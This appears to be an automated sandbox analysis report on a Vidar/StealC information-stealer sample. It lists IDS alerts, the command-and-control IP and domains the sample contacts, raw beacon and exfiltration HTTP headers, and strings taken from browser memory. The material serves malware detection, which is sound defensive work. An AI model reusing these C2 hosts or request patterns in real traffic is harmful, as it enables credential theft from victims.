              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50043 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50043 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:49952 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50037 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50037 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50042 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50042 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50040 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50040 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 88.99.124.230:443 -> 192.168.2.4:49931
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50041 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50041 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50039 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50039 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 88.99.124.230:443 -> 192.168.2.4:49941
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50044 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.4:50044 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50049 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50048 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50051 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50052 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50047 -> 88.99.124.230:443
              Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.4:50050 -> 88.99.124.230:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199825403037
              Performs DNS queries to domains with low reputation
              Source: DNS query: xu3.201008281.xyz
              Source: global trafficHTTP traffic detected: GET /b4cha00 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
              Source: Joe Sandbox ViewIP Address: 88.99.124.230 88.99.124.230
              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
              Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 77.239.117.222:443
              Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
              Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
              Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
              Source: unknownTCP traffic detected without corresponding DNS query: 77.239.117.222
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,4_2_00403C79
              Source: global trafficHTTP traffic detected: GET /b4cha00 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0Host: xu3.201008281.xyzConnection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000006.00000003.2651916673.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2652912965.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2652292688.000042E800F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
              Source: chrome.exe, 00000006.00000003.2651916673.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2652912965.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2652292688.000042E800F60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000006.00000002.2719017563.000042E8004B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2719017563.000042E8004B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2640567303.000042E800624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
              Source: chrome.exe, 00000006.00000002.2718165993.000042E8002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: t.me
              Source: global trafficDNS traffic detected: DNS query: xu3.201008281.xyz
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----f3ohlfuk6f3e3ectri5fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0Host: xu3.201008281.xyzContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
